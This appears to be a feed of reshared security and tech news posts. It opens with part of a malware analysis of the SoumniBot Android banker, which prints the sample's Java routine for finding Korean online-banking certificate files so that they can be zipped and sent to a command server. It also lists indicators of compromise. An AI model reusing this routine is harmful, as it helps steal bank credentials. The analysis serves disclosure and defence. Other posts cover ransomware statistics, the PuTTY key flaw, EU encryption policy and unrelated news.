The command with the number 0 is worth special mention. It searches, among other things, external storage media for .key and .der files that contain paths to /NPKI/yessign.
import java.util.ArrayList;
import java.util.List;
import android.content.Context;
import android.database.Cursor;
import android.provider.MediaStore;

// Routine from the sample as shown in the report: queries the MediaStore index
// of external storage for .key/.der files and keeps the first path under /NPKI/yessign.
public static List<String> getAllBankingKeys(Context context) {
    List<String> list = new ArrayList<>();
    Cursor cursor = context.getContentResolver().query(MediaStore.Files.getContentUri("external"),
            new String[]{"_id", "mime_type", "_size", "date_modified", "_data"},
            "(_data LIKE '%.key' OR _data LIKE '%.der')", null, null);
    int index = cursor == null ? 0 : cursor.getColumnIndexOrThrow("_data");
    if (cursor != null) {
        while (cursor.moveToNext()) {
            String s = cursor.getString(index);
            if (!s.contains("/NPKI/yessign")) {
                continue;
            }
            Logger.log("path is:" + s);   // Logger is the malware's own logging class
            list.add(s);
            break;                        // stops after the first matching path
        }
        cursor.close();
    }
    return list;
}
If the application finds files like that, it copies the directory where they are located into a ZIP archive and sends it to the C&C server. These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions. This technique is quite uncommon for Android banking malware. Kaspersky security solutions detect SoumniBot despite its sophisticated obfuscation techniques, and assign to it the verdict of Trojan-Banker.AndroidOS.SoumniBot.

Conclusion


Malware creators seek to maximize the number of devices they infect without being noticed. This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded due to insufficiently strict validations in the Android manifest parser code.

We have detailed the techniques used by this Trojan, so that researchers around the world are aware of the tactics, which other types of malware might borrow in the future. Besides the unconventional obfuscation, SoumniBot is notable for stealing Korean online banking keys, which we rarely observe in Android bankers. This feature lets malicious actors empty unwitting victims’ wallets and circumvent authentication methods used by banks. To avoid becoming a victim of malware like that, we recommend using a reliable security solution on your smartphone to detect the Trojan and prevent it from being installed despite all its tricks.

Indicators of compromise


MD5
0318b7b906e9a34427bf6bbcf64b6fc8
00aa9900205771b8c9e7927153b77cf2
b456430b4ed0879271e6164a7c0e4f6e
fa8b1592c9cda268d8affb6bceb7a120

C&C
https[://]google.kt9[.]site
https[://]dbdb.addea.workers[.]dev


https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/


The Privacy Post reshared this.


The Privacy Post reshared this.


85.7% increase in ransomware in Italy, reports the Assintel Cyber Think Tank
https://poliverso.org/display/0477a01e-6b35ef2d-1994e0cdcb8e3306



The annual report on the state of cyber security, published by Assintel's Cyber Think Tank, highlights a worrying increase in cyber attacks over the course of 2023. The data collected indicate a notable 184% increase in the number of attacks compared with the previous year, with a total of 7,068 attacks identified and classified during the year.

It is worth noting that 61% of these attacks come exclusively from the Dark Web, underlining the need to monitor unconventional sources. The seasonal analysis of attacks revealed a peak during spring, with April recording the highest number of offensives, followed by March, November, July and June. January and February, by contrast, showed less criminal activity. Cybercrime was the main threat, accounting for 93% of all attacks in 2023. While the categories linked to espionage and information warfare appear to be decreasing, hacktivism increased slightly.

Sectors such as manufacturing, professional/scientific/technical services, ICT, healthcare and finance/insurance were among the hardest hit. In addition, a significant increase in attacks against the American continent was observed, accounting for 50% of all attacks in 2023, followed by Europe, Asia and Africa. The techniques most used by attackers include malware, which accounted for 70% of all attacks, followed by the exploitation of vulnerabilities and unknown techniques. About a quarter of the attacks had critical impacts, while 67% caused serious impacts, indicating an increase in attacks with catastrophic economic, legal or reputational consequences for the victims. Assintel's Cyber Think Tank stressed the urgent need to strengthen cyber security measures and promote public-private collaboration to counter this growing threat to digital security effectively.

Ransomware remains a significant threat. In the first quarter of 2023, there was a significant increase in attacks aimed at data theft and ransom demands. Ransomware gangs caused serious economic and reputational damage, with a 19% increase in the number of victims compared with the previous quarter. In particular, Italy saw an 85.7% increase in victims compared with the fourth quarter of 2022.

In the second quarter of 2023, the number of ransomware victims rose by 62% compared with the previous quarter, with SMEs accounting for 80% of victims. Service companies were the hardest hit by ransomware gangs, with 47% of victims. Alongside ransomware attacks, phishing continued to pose a significant threat to cyber security throughout 2023, with attackers using increasingly sophisticated methods to obtain sensitive information.

In the second half of 2023, the ransomware trend continued, with a total of 2,616 victims recorded in 94 different countries. Ransomware gangs remained active, with a total of 52 groups identified. The United States was the most affected country, followed by the United Kingdom, Canada, Germany and Italy.

Pierguido Iezzi, CEO of Swascan (Tinexta Cyber) and coordinator of Assintel's Cyber Think Tank, stressed the growing vulnerability of companies of all sizes and the importance of adopting a holistic approach to cyber defence that includes preventive and proactive measures. In an increasingly complex and threatening landscape for SMEs, the role of associations in the cyber security sector becomes crucial. Assintel's Cyber Think Tank is therefore committed to providing more effective support to SMEs in the field of cyber security, expanding and consolidating the Aziende Cyber Assintel ecosystem.

It also offers valuable support to SMEs in managing cyber risks, from technology to legal compliance, keeping them constantly up to date on new regulations and on the technologies available to improve their cyber security. Assintel's President, Paola Generali, echoes these words: "Associations are a crucial competitive lever for SMEs, allowing them to share knowledge and resources and to present a united front against the cross-cutting challenges they face. Associations also play a fundamental role in representing SMEs' interests at the institutional level and in engaging with the competent authorities".

In a context in which cybersecurity is becoming increasingly crucial, collective commitment is essential to guaranteeing the security of data and digital infrastructure.

The article 85.7% increase in ransomware in Italy, reports the Assintel Cyber Think Tank comes from il blog della sicurezza informatica.


The Privacy Post reshared this.


The Privacy Post reshared this.


A ROG Ally Battery Mod You Ought To Try
https://poliverso.org/display/0477a01e-23cd4fd1-a6a7e01e31020270



The mod as installed into the handheld, complete with the custom 3D-printed back, with a screwdriver being used to install one of the screws

Today’s hack is an unexpected but appreciated contribution from members of the iFixit crew, published by [Shahram Mokhtari]. This is an ROG Ally Asus-produced handheld gaming console mod that has you upgrade the battery to an aftermarket battery from an Asus laptop to double your battery life (40 Wh to 88 Wh).

There are two main things you need to do: replace the back cover with a 3D printed version that accommodates the new battery, and move the battery wires into the shell of an old connector. No soldering or crimping needed — just take the wires out of the old connector, one by one, and put them into a new connector. Once that is done and you reassemble your handheld, everything just works; the battery is recognized by the OS, can be charged, runs the handheld wonderfully all the same, and the only downside is that your ROG Ally becomes a bit thicker.


The best part is, it’s hard to fail at applying this mod, as it’s documented to the high standards we’d expect from iFixit. The entire journey is split into detailed steps, there’s no shortage of pictures, and the group has also added warnings for the few potentially problematic aspects you want to watch out for. Plus, in the comment section, we’ve learned that there’s an entire community called AllyMods dedicated to ROG Ally modding that has spawned creations like the dual display mod, which is a joy to see!

This mod reminds us of the time someone modified a Nintendo Game Boy Advance SP with a thicker shell too, not just extending the battery, but also adding things like Bluetooth and 3.5 mm audio, USB-C and wireless charging. A worthy upgrade for a beloved device!


The Privacy Post reshared this.


The Privacy Post reshared this.


1/3 48 civil society orgs & 26 individual experts call on Member States representatives to ❌REJECT @eu2024be's latest #CSAR compromise.

The text is flawed & harmful. It will enable #MassSurveillance & undermine #encryption.

Read more: https://edri.org/our-work/open-letter-mass-surveillance-and-undermining-encryption-still-on-table-in-eu-council

reshared this

in reply to EDRi

2/3 The latest Council #CSAR proposal:

allows #DetectionOrders to be issued very broadly - ignoring EU Council Legal Service's concerns that this is 🙅🏿 NOT compatible with human rights law prohibiting general monitoring.

Chances are @EUCourtPress would annul #DetectionOrders.🚫

in reply to EDRi

3/3 This year, the European Court of Human Rights ruled that weakening encryption violates #FundamentalRights.

The Council's latest #CSAR texts ignore the ruling, keeps #CSS on the table & don’t stop providers from being forced to weaken #encryption.

tl;dr⚖️The Council's falling foul of the law.

Oblomov reshared this.

in reply to EDRi

@torproject @epicenter_works
@d3

There are too many hits for @informatik. Did you mean the Gesellschaft für Informatik, the professional association of people working in computer science?

in reply to EDRi

We have published a Japanese translation. JCA-NET has also become a signatory to this statement.
Under the pretext of "child sexual abuse (#CSA) regulation", a move is under way in the EU to let investigative agencies carry out mass surveillance and weaken encryption, and it could spread to countries around the world.

(Joint statement) The problems of #大量監視 (mass surveillance) and the weakening of #暗号化 (encryption) are still under discussion in the #EU理事会 (EU Council).
https://www.jca.apc.org/jca-net/ja/node/350


The Privacy Post reshared this.


PuTTY developers warn of a serious security flaw. Keys are compromised
https://poliverso.org/display/0477a01e-cf14cc65-d2d6f2b62e3fc6b9



The PuTTY developers are warning of a critical vulnerability affecting versions 0.68 through 0.80. The flaw could allow an attacker to fully recover NIST P-521 private keys.

The vulnerability CVE-2024-31497 stems from errors in the generation of ECDSA cryptographic numbers, which allow private keys to be recovered. The discovery is credited to researchers Fabian Bäumer and Markus Brinkmann of Ruhr University Bochum.

The first 9 bits of each ECDSA nonce are zero, allowing full recovery of the private key from about 60 signatures using state-of-the-art techniques.

An attacker in possession of a few dozen signed messages and a public key will have enough data to recover the private key and forge signatures, which can lead to unauthorised access to servers and services that use that key.

The problem also affected other products that bundle vulnerable versions of PuTTY:

  • FileZilla (3.24.1 – 3.66.5);
  • WinSCP (5.9.5 – 6.3.2);
  • TortoiseGit (2.4.0.2 – 2.15.0);
  • TortoiseSVN (1.10.0 – 1.14.6).

Following responsible disclosure, the problem has been fixed in the new releases PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 and TortoiseGit 2.15.0.1.

The developers have adopted the RFC 6979 technique for all DSA and ECDSA key types, abandoning the previous method. TortoiseSVN users are advised to use Plink from the latest PuTTY release, 0.81, when accessing SVN repositories over SSH until an update is released.
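
RFC 6979, which the PuTTY fix adopts, removes the random nonce entirely: k is derived from the private key and the message hash with HMAC, so the same message always yields the same k and a biased generator has no way to leak bits of the key. The Python function below is an added example implementing the RFC 6979 section 3.2 procedure; it is not PuTTY's code (which is C and covers P-521 and the other curves) and uses NIST P-256 with SHA-256 only because the RFC publishes a test key and expected nonce for that combination (appendix A.2.5, message "sample"). The group order is passed as a parameter, so the same routine applies to any curve, P-521 included.

```python
import hashlib
import hmac

# NIST P-256 group order and the test private key from RFC 6979 appendix A.2.5
# (a published test vector, not a real key).
P256_ORDER = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
RFC6979_TEST_KEY = 0xC9AFA9D845BA75166B5C215767B1D6934E50C3DB36E89B127B8A622B120F6721


def bits2int(data: bytes, qlen: int) -> int:
    """RFC 6979 2.3.2: big-endian integer from the leftmost qlen bits of data."""
    val = int.from_bytes(data, "big")
    blen = len(data) * 8
    return val >> (blen - qlen) if blen > qlen else val


def deterministic_nonce(priv: int, msg_hash: bytes, q: int = P256_ORDER, hashfn=hashlib.sha256) -> int:
    """Derive the ECDSA nonce k from the private key and message hash (RFC 6979 section 3.2).
    Identical inputs give identical k; k depends on the key only through HMAC."""
    qlen, rlen = q.bit_length(), (q.bit_length() + 7) // 8
    hlen = hashfn().digest_size
    h1 = bits2int(msg_hash, qlen) % q                      # bits2octets(h1) reduces mod q first
    seed = priv.to_bytes(rlen, "big") + h1.to_bytes(rlen, "big")   # int2octets(x) || bits2octets(h1)
    V, K = b"\x01" * hlen, b"\x00" * hlen                  # steps b, c
    K = hmac.new(K, V + b"\x00" + seed, hashfn).digest()   # step d
    V = hmac.new(K, V, hashfn).digest()                    # step e
    K = hmac.new(K, V + b"\x01" + seed, hashfn).digest()   # step f
    V = hmac.new(K, V, hashfn).digest()                    # step g
    while True:                                            # step h
        T = b""
        while len(T) < rlen:                               # collect at least qlen bits
            V = hmac.new(K, V, hashfn).digest()
            T += V
        k = bits2int(T, qlen)
        if 1 <= k < q:
            return k
        K = hmac.new(K, V + b"\x00", hashfn).digest()      # candidate out of range: re-key and retry
        V = hmac.new(K, V, hashfn).digest()


def nonce_for_message(priv: int, message: bytes) -> int:
    """Hash the message with SHA-256 and derive the nonce for it."""
    return deterministic_nonce(priv, hashlib.sha256(message).digest())


if __name__ == "__main__":
    print(hex(nonce_for_message(RFC6979_TEST_KEY, b"sample")))
```

For the test key and the message "sample", the function returns the k listed in the RFC, 0xA6E3C57DD01ABE90086538398355DD4C3B17AA873382B0F24D6129493D8AAD60. The nonce is still secret and must be treated as such; what the construction buys is that its distribution is that of HMAC output rather than of whatever generator the application happened to use.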

ECDSA NIST P-521 keys used in any of the affected components must be considered compromised and immediately revoked by removing them from "~/.ssh/authorized_keys" and similar files on other SSH servers.

The article PuTTY developers warn of a serious security flaw. Keys are compromised comes from il blog della sicurezza informatica.


The Privacy Post reshared this.


The Privacy Post reshared this.


The Future of Work According to Elon Musk: Technological Revolution or Social Chaos?
https://poliverso.org/display/0477a01e-dc567021-141c1334426099db



Elon Musk's latest prediction about the future of work seems in equal parts utopian and somewhat terrifying. Speaking at an artificial intelligence summit in November 2023, the eccentric billionaire claimed that advanced artificial intelligence will eventually be able to "do everything" when it comes to work and employment.

"There will come a point where no job is needed," he told British Prime Minister Rishi Sunak. "You can have a job if you want one for personal satisfaction, but AI will be able to do everything."

For anyone whose identity and livelihood are tied to their career, that could be a hard pill to swallow. While Musk predicts that artificial intelligence will make human work optional rather than mandatory for survival, he insists that this automation of the workforce will give rise to what he calls "an age of abundance".

The idea is that hyper-intelligent AI systems will act as omniscient "magic genies", providing all the goods, services and education we might need or want. No more shortages, just plenty for everyone without having to work.

To offset the employment crisis, Musk is pushing something called "universal high income". Unlike basic minimum income schemes, this would give everyone more generous and dignified financial support, no questions asked. "It will be some kind of equaliser," he said.

It sounds idyllic in theory. But of course not everyone shares his view. Experts such as Julia Hobsbawm are sounding the alarm. "I fear Mr Musk is an unrealistic utopian," she told GOBankingRates. "Like many in the tech world, he argues that replacing humans in the workplace is inevitable and desirable. It absolutely is not."

Hobsbawm argues that the focus should be on properly training workers to collaborate with AI systems, not simply handing them a cheque while robots take over. "Work matters in our lives," she insists.

So is Musk's "age of abundance" a real glimpse of an AI-driven future in which nobody has to work? Or are we heading for mass unemployment and social collapse? Other experts, such as Alexandra Levit, author of "Humanity Works", take a more measured view.

"I think he's right... in a sense," Levit said. "We'll probably have some form of basic income, and AI will automate some of the jobs. But it won't happen overnight or in as extreme a way as Musk suggests."

Levit predicts that, while AI will have a huge impact on every sector, it will also create new job opportunities we cannot yet imagine. "I believe enough new roles will emerge that humans will not stop working altogether."

The article The Future of Work According to Elon Musk: Technological Revolution or Social Chaos? comes from il blog della sicurezza informatica.


The Privacy Post reshared this.


The Privacy Post reshared this.


Letta to recommend creation of EU Deep Tech Stock Exchange
https://poliverso.org/display/0477a01e-ce545f15-98f9afbb93900e8d




Europe's stock markets are plagued by problems that prevent deep tech startups from getting the funding they need, Letta wrote.


https://www.euractiv.com/section/digital/news/letta-to-recommend-creation-of-eu-deep-tech-stock-exchange/


The Privacy Post reshared this.


The Privacy Post reshared this.


OpenJS in the crosshairs. A new backdoor attempt similar to XZ Utils foiled
https://poliverso.org/display/0477a01e-f15ef81e-7f26abeecebce221



Cyber security experts recently succeeded in foiling an attempt to hijack a project on the OpenJS platform that, in broad terms, closely resembles the recent backdoor incident in the XZ Utils compression utility.

On Monday 15 April, the OpenJS Foundation, a non-profit that oversees JavaScript projects used by billions of sites worldwide, received a series of suspicious emails. The senders demanded that one of the popular projects be urgently updated to fix critical vulnerabilities, without giving any details.

Robin Bender Ginn of OpenJS and Omkar Arasaratnam of the Open Source Security Foundation reported that the authors of the emails insisted on being appointed as new maintainers of a popular project (name withheld), despite having no prior experience working on it.

The experts noted the similarity of the methods to the actions of the hacker known as Jia Tan, whom we covered recently. It was Jia Tan, whose identity may conceal an entire team of skilled hackers, who had previously managed to introduce a backdoor into the XZ Utils utility.

Ginn and Arasaratnam stressed that none of those who applied were granted privileged access to the project, since the experts immediately suspected that something was wrong.

According to Chris Hughes of Endor Labs, around a quarter of all cyber security projects have a single maintainer and 94% have fewer than ten. He observed that the open source software ecosystem is extremely heterogeneous and vulnerable because of the global dependence on anonymous developers.

CISA officials Jack Cable and Aeva Black voiced the need to rethink approaches to security in technology production. They argue that companies using open source software should contribute to the sustainability of the ecosystem, including financially or through developer time.

Arasaratnam also announced the Linux Foundation's plans to develop specific guidelines for project maintainers who may face aggressive takeover attempts. He further stressed the importance of supporting maintainers in the fight against social engineering and manipulation, which can potentially lead to very serious consequences.

The article OpenJS in the crosshairs. A new backdoor attempt similar to XZ Utils foiled comes from il blog della sicurezza informatica.


reshared this


The Privacy Post reshared this.


The EU Must Seize its Opportunity to Inspire, Not Regulate, Innovation [Promoted content]
https://poliverso.org/display/0477a01e-27317787-4ad5bace1acec6ba




New leadership must determine which policies can help Europe balance sustainability and competitiveness by reaping the benefits of innovation at a time of acute global challenges. The next mandate must ensure technology-driven businesses can thrive in Europe while upholding the Union's fundamental values.


https://www.euractiv.com/section/digital/opinion/the-eu-must-seize-its-opportunity-to-inspire-not-regulate-innovation/


The Privacy Post reshared this.
